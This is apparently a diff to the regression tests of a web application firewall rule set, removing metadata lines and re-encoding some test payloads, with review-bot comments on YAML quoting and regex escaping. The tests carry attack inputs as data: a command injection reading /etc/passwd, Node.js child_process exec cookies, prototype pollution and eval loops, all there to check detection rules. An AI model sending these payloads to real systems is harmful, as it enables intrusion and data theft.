--- a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930130.yaml +++ b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930130.yaml @@ -1,7 +1,6 @@ --- meta: author: "Andrew Howe, azurit" - description: "None" rule_id: 930130 tests: - test_id: 1 diff --git a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931100.yaml b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931100.yaml index ca85a2736..fe62f3a92 100644 --- a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931100.yaml +++ b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931100.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, azurit" - description: None tests: - test_id: 1 desc: Remote File Inclusion Attack (931100) from old modsec regressions diff --git a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931110.yaml b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931110.yaml index 37f4e627c..b03ef1598 100644 --- a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931110.yaml +++ b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931110.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, azurit" - description: None tests: - test_id: 1 desc: Remote File Inclusion Attack (931110) from old modsec regressions diff --git a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931120.yaml b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931120.yaml index 0b95fd320..0ae323632 100644 --- a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931120.yaml +++ b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931120.yaml @@ -1,7 +1,6 @@ --- meta: author: "studersi, azurit" - description: None tests: - test_id: 1 desc: Remote File Inclusion Attack (931120) diff --git a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931130.yaml b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931130.yaml index 19e752d02..d9f5c7581 100644 
--- a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931130.yaml +++ b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931130.yaml @@ -1,7 +1,6 @@ --- meta: author: "studersi, azurit" - description: None tests: - test_id: 1 desc: Remote File Inclusion Attack (931130) diff --git a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931131.yaml b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931131.yaml index b57d42210..5d1e1291c 100644 --- a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931131.yaml +++ b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931131.yaml @@ -1,7 +1,6 @@ --- meta: author: "emphazer, azurit" - description: None tests: - test_id: 1 desc: Remote File Inclusion Attack (931131) with REQUEST_FILENAME diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932120.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932120.yaml index 4e4f74a71..9050adb99 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932120.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932120.yaml @@ -1,7 +1,6 @@ --- meta: author: "Paul Beckett, azurit" - description: "Tests to trigger or not trigger rule 932120" rule_id: 932120 tests: - test_id: 1 diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932125.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932125.yaml index db6723858..a4fb0ce80 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932125.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932125.yaml @@ -1,7 +1,6 @@ --- meta: author: "0xInfection" - description: "Tests to trigger rule 932125" rule_id: 932125 tests: - test_id: 1 diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932130.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932130.yaml index 6c38dc749..ba37e6c0c 100755 
--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932130.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932130.yaml @@ -1,7 +1,6 @@ --- meta: author: "Paul Beckett, Max Leske, azurit" - description: "Tests to trigger or not trigger rule 932130" rule_id: 932130 tests: - test_id: 1 diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932131.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932131.yaml index e7e479eb2..3f673ed4a 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932131.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932131.yaml @@ -1,7 +1,6 @@ --- meta: author: "dune73, Max Leske, azurit" - description: "Tests to trigger or not trigger rule 932131" rule_id: 932131 tests: - test_id: 1 diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932160.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932160.yaml index fa787f6fa..c2a0a6344 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932160.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932160.yaml @@ -1,7 +1,6 @@ --- meta: author: "Paul Beckett, Esad Cetiner, azurit" - description: "Tests to trigger or not trigger rule 932160" rule_id: 932160 tests: - test_id: 1 diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml index f678da553..3f125fc35 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml @@ -210,7 +210,8 @@ tests: uri: "/get?host=www.google.com;/bin/ca?+/et*/passwd" version: HTTP/1.0 output: - no_log_contains: found within MATCHED_VAR + log: + match_regex: 'found within ARGS:host:' - test_id: 14 desc: "Test variable assignment ('cat /etc/passwd' assigned via individual variables, cat in reverse order)" stages: 
diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932236.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932236.yaml index 9e8e3fd92..8b2b6d423 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932236.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932236.yaml @@ -5,7 +5,8 @@ meta: Unix shell RCE - with / without prefix - command words of any length - - usual targets + `Referer` and `User-Agent`rule_id: 932236 + - usual targets + `Referer` and `User-Agent` +rule_id: 932236 tests: - test_id: 1 desc: "False negative report - POST arguments" diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932239.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932239.yaml index 99fb9ae84..7a8729b70 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932239.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932239.yaml @@ -5,7 +5,8 @@ meta: Unix shell RCE - with / without prefix - command words of any length - - usual targets + `Referer` and `User-Agent`rule_id: 932239 + - usual targets + `Referer` and `User-Agent` +rule_id: 932239 tests: - test_id: 1 desc: "Unix RCE in request headers" diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932260.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932260.yaml index 16c017ce0..d9e377534 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932260.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932260.yaml @@ -1,7 +1,6 @@ --- meta: author: "Paul Beckett, Franziska Bühler, karelorigin, Esad Cetiner, azurit" - description: "Tests to trigger or not trigger rule 932260" rule_id: 932260 tests: - test_id: 1 diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933100.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933100.yaml index 5c935e1e7..c6824245c 100644 
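Review bot: The fix restores `rule_id: 932236` as a top-level `meta` key; in the old text it was glued onto the last line of the `description` block scalar, so `meta.rule_id` was absent and the description ended in `'User-Agent'rule_id: 932236`. The same repair is made in the 932239 hunk. Nothing in the YAML itself flags a missing `rule_id`, and if the runner keys test overrides on `meta.rule_id` (not visible here) such a file would silently lose its overrides, so a lint step asserting that every test file's `meta.rule_id` is present and matches its filename would catch the next occurrence.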
--- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933100.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933100.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, Franziska Bühler, azurit" - description: None tests: - test_id: 1 desc: PHP Injection Attack (933100) from old modsec regressions diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933110.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933110.yaml index c0aba7cb6..ed0a6b4b9 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933110.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933110.yaml @@ -1,7 +1,6 @@ --- meta: author: "lifeforms, azurit" - description: None tests: - test_id: 1 desc: PHP no file upload diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933111.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933111.yaml index cf55f158f..00adca968 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933111.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933111.yaml @@ -1,7 +1,6 @@ --- meta: author: "NiceYouKnow, azurit" - description: None tests: - test_id: 1 desc: "PHP Injection Attack: PHP Script File Upload Found" diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933120.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933120.yaml index 868003ce2..48d23b566 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933120.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933120.yaml @@ -1,7 +1,6 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None tests: - test_id: 1 desc: "PHP Injection Attack: Configuration Directive" 
@@ -37,7 +36,8 @@ tests: data: "var=session.referer_check%3dtrue" version: HTTP/1.0 output: - no_log_contains: = found within + log: + match_regex: 'session.referer_check found within ARGS:var:' - test_id: 3 desc: "PHP Injection Attack: Configuration Directive: engine" stages: diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933130.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933130.yaml index 29f0a94b7..653bbab73 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933130.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933130.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, azurit" - description: Tests functionality of 933130 rule_id: 933130 tests: - test_id: 1 diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933131.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933131.yaml index 4254ed3db..55fbb3c87 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933131.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933131.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, azurit" - description: Tests functionality of stricter sibling 933131 rule_id: 933131 tests: - test_id: 1 diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933140.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933140.yaml index 0041e05dc..9b73d9bb9 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933140.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933140.yaml @@ -1,7 +1,6 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None tests: - test_id: 1 desc: "PHP Injection Attack: I/O Stream" diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933150.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933150.yaml index 5ab265a83..9f5fa44d8 100644 
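Review bot: The new `match_regex` in the 933120 hunk leaves the `.` in `session.referer_check` unescaped, so the pattern also accepts `sessionXreferer_check` or `session referer_check`; since this value is a regex rather than a literal, it should read `match_regex: 'session\.referer_check found within ARGS:var:'`. The pattern is unanchored, which is acceptable for a log substring check but worth keeping in mind if the assertion is tightened later. This also turns the former negative `no_log_contains` assertion into a positive one, so a run in which the rule does not fire at all now fails; that is presumably intended, but the test's `desc` line lies outside the hunk and should state that a match is expected.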
--- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933150.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933150.yaml @@ -1,7 +1,6 @@ --- meta: author: "lifeforms, azurit" - description: None tests: - test_id: 1 desc: phpinfo diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933151.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933151.yaml index 1dd59171d..ad9c14489 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933151.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933151.yaml @@ -1,7 +1,6 @@ --- meta: author: "lifeforms, ssigwart, azurit" - description: None tests: - test_id: 1 desc: "pmf + chain" diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml index 6ee4b956e..86ef8941b 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml @@ -1,7 +1,6 @@ --- meta: author: "lifeforms, Franziska Bühler, Max Leske, azurit" - description: None tests: - test_id: 1 desc: | @@ -260,7 +259,7 @@ tests: - test_id: 15 desc: | PHP function call with empry c-style comment syntax, whitespaces, and vertical tab. - payload: exec /**/ () + payload: exec \t/**/\t () stages: - input: dest_addr: 127.0.0.1 diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933161.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933161.yaml index cb9af4ed2..e277b6468 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933161.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933161.yaml @@ -1,7 +1,6 @@ --- meta: author: "lifeforms, azurit" - description: None tests: - test_id: 1 desc: regexp; must run test in PL3! 
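Review bot: The rewritten `payload:` line in the 933160 `@@ -260` hunk sits inside a `desc: |` literal block, so `\t` is documentation text rather than an actual tab, yet the sentence above it says the case covers a vertical tab; `\t` conventionally denotes a horizontal tab, so either the prose or the notation is off. The request stage that sends the real bytes is outside the hunk, so which whitespace character is actually used cannot be confirmed from here. Suggest either `payload: exec \v/**/\v ()` if the stage sends vertical tabs, or rewording the prose to "horizontal tab"; the `empry` typo in the neighbouring context line could be fixed in the same touch.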
diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933170.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933170.yaml index e8dc30535..0464e98c4 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933170.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933170.yaml @@ -1,7 +1,6 @@ --- meta: author: "lifeforms, azurit" - description: None tests: - test_id: 1 desc: PHP object injection diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933180.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933180.yaml index b2f79f0ca..b93c8ba6e 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933180.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933180.yaml @@ -1,7 +1,6 @@ --- meta: author: "lifeforms, azurit" - description: None tests: - test_id: 1 desc: PHP variable functions diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933190.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933190.yaml index 21a4dc9b3..0c2a9e839 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933190.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933190.yaml @@ -1,7 +1,6 @@ --- meta: author: "NiceYouKnow, azurit" - description: None tests: - test_id: 1 desc: "PHP Injection Attack: PHP Closing Tag Found" diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933200.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933200.yaml index e46e9c1c8..de7a6248d 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933200.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933200.yaml @@ -1,7 +1,6 @@ --- meta: author: "NiceYouKnow, azurit" - description: None tests: - test_id: 1 desc: "Positive test: PHP Injection Attack - Wrapper scheme detected (phar://)" 
diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934100.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934100.yaml index 17d72f457..4dfd1dc63 100644 --- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934100.yaml +++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934100.yaml @@ -1,7 +1,6 @@ --- meta: author: "lifeforms, airween, Max Leske, azurit" - description: "Tests for rule 934100" rule_id: 934100 tests: - test_id: 1 @@ -426,40 +425,6 @@ tests: output: log: expect_ids: [934100] - - test_id: 25 - desc: "5ZLKNU33" - stages: - - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - data: | - console.info(1) - uri: /post - output: - log: - expect_ids: [934100] - - test_id: 26 - desc: "5ZLKNU33" - stages: - - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - data: | - console.info(1) - uri: /post - output: - log: - expect_ids: [934100] - test_id: 27 desc: "Detect example function _$$ND_FUNC$$_ submitted as plaintext" stages: diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934101.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934101.yaml index 7d152b405..fbb8fbcfb 100644 --- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934101.yaml +++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934101.yaml @@ -1,7 +1,6 @@ --- meta: author: "rekter0, azurit" - description: "Tests for rule 934101" rule_id: 934101 tests: - test_id: 1 
@@ -110,7 +109,7 @@ tests: Host: localhost User-Agent: "OWASP CRS test agent" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Cookie: test_cookie=require("child_process").exec('whoami') + Cookie: test_cookie=\u0072\u0065quire("child_process").exec('whoami') method: GET port: 80 uri: "/get" @@ -161,7 +160,7 @@ tests: Host: localhost User-Agent: "OWASP CRS test agent" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Cookie: test_cookie=cmVxdWlyZSgiY2hpbGRfcHJvY2VzcyIpLmV4ZWMoJ3dob2FtaScpCg== + Cookie: test_cookie=\u0063\u006dVxdWlyZSgiY2hpbGRfcHJvY2VzcyIpLmV4ZWMoJ3dob2FtaScpCg== method: GET port: 80 uri: "/get" diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934130.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934130.yaml index d4fa4810c..42ff4adc5 100644 --- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934130.yaml +++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934130.yaml @@ -1,7 +1,6 @@ --- meta: author: "lifeforms, azurit" - description: "Tests for rule 934130" rule_id: 934130 tests: - test_id: 1 @@ -209,7 +208,7 @@ tests: Host: localhost User-Agent: "OWASP CRS test agent" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Cookie: test_cookie=__proto__.foo=bar + Cookie: test_cookie=__\u0070\u0072oto__.foo=bar method: GET port: 80 uri: "/get" diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934140.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934140.yaml index f4fce6961..080d6ab13 100644 --- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934140.yaml +++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934140.yaml 
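Review bot: The `\u0072\u0065quire(...)` escape in the new `Cookie:` line is a plain (unquoted) YAML scalar, so the parser leaves the backslash sequences as literal text and the client sends the characters `\u0072\u0065` rather than `re`; the two 934160 hunks further down place the same kind of escape inside a double-quoted `uri:` value, where YAML decodes `\u0077\u0068` to `wh` before the request is built, making the sent payload byte-identical to the removed line. One of the two conventions is presumably not what was intended: if the literal escape form is meant everywhere, the 934160 values should be single-quoted (`uri: '/get?eval=\u0077\u0068ile(true);'`), and if YAML-level decoding is meant, these Cookie lines should be double-quoted. Whether the test runner applies its own unescaping on top is not visible here and would change the analysis. The same question applies to the second 934101 hunk (`\u0063\u006dVxdW...`) and to the 934130 `__\u0070\u0072oto__` hunk.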
@@ -1,7 +1,6 @@ --- meta: author: "karelorigin, azurit" - description: "Tests for rule 934140" rule_id: 934140 tests: - test_id: 1 diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934150.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934150.yaml index 01a2b4598..60ed9998e 100644 --- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934150.yaml +++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934150.yaml @@ -1,7 +1,6 @@ --- meta: author: "karelorigin, azurit" - description: "Tests for rule 934150" rule_id: 934150 tests: - test_id: 1 diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934160.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934160.yaml index 437a05641..aed2d48cb 100644 --- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934160.yaml +++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934160.yaml @@ -1,7 +1,6 @@ --- meta: author: "karelorigin, azurit" - description: "Tests for rule 934160" rule_id: 934160 tests: - test_id: 1 @@ -479,7 +478,7 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 method: GET port: 80 - uri: "/get?eval=while(true);" + uri: "/get?eval=\u0077\u0068ile(true);" version: HTTP/1.1 output: log: @@ -527,7 +526,7 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 method: GET port: 80 - uri: "/get?eval=d2hpbGUodHJ1ZSk7Cg%3D%3D" + uri: "/get?eval=\u0064\u0032hpbGUodHJ1ZSk7Cg%3D%3D" version: HTTP/1.1 output: log: diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941100.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941100.yaml index edea0617d..b0e54a727 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941100.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941100.yaml 
@@ -1,7 +1,6 @@ --- meta: author: "csanders-git, Walter Hop, azurit" - description: "Tests to trigger, or not trigger 941100" rule_id: 941100 tests: - test_id: 1 diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941101.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941101.yaml index 8d1bc6368..d80795be4 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941101.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941101.yaml @@ -1,7 +1,6 @@ --- meta: author: "4v3r9, Walter Hop, azurit" - description: "Test to trigger 941101" rule_id: 941101 tests: - test_id: 1 diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941110.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941110.yaml index d1b88c709..0fa0750f8 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941110.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941110.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, azurit" - description: "Tests to trigger, or not trigger 941110" rule_id: 941110 tests: - test_id: 1 diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941120.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941120.yaml index 004cc9e13..1ca8f74c9 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941120.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941120.yaml @@ -1,7 +1,6 @@ --- meta: author: "Christian S.J. Peron, Walter Hop, azurit" - description: None tests: - test_id: 1 desc: "XSS Filter - Category 2: Event Handler Vector" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941130.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941130.yaml index 4a053dcd1..c6190136a 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941130.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941130.yaml 
@@ -1,7 +1,6 @@ --- meta: author: "csanders-git, Christian Folini, azurit" - description: "Tests to trigger, or not trigger 941130" rule_id: 941130 tests: - test_id: 1 diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941140.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941140.yaml index 0bf49cdb2..bcebadd21 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941140.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941140.yaml @@ -1,7 +1,6 @@ --- meta: author: "zmallen, azurit" - description: "Tests to trigger, or not trigger 941130" rule_id: 941140 tests: - test_id: 1 diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941150.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941150.yaml index e24ca1ea8..847216a7e 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941150.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941150.yaml @@ -1,7 +1,6 @@ --- meta: author: "zmallen, azurit" - description: "Tests to trigger, or not trigger 941150" rule_id: 941150 tests: - test_id: 1 diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941160.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941160.yaml index 474294e41..5f5121ac2 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941160.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941160.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, Franziska Bühler, Walter Hop, Xhoenix, azurit" - description: "Tests to trigger, or not trigger 941160" rule_id: 941160 tests: - test_id: 1 diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941170.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941170.yaml index 0b9f50040..778e7cf57 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941170.yaml 
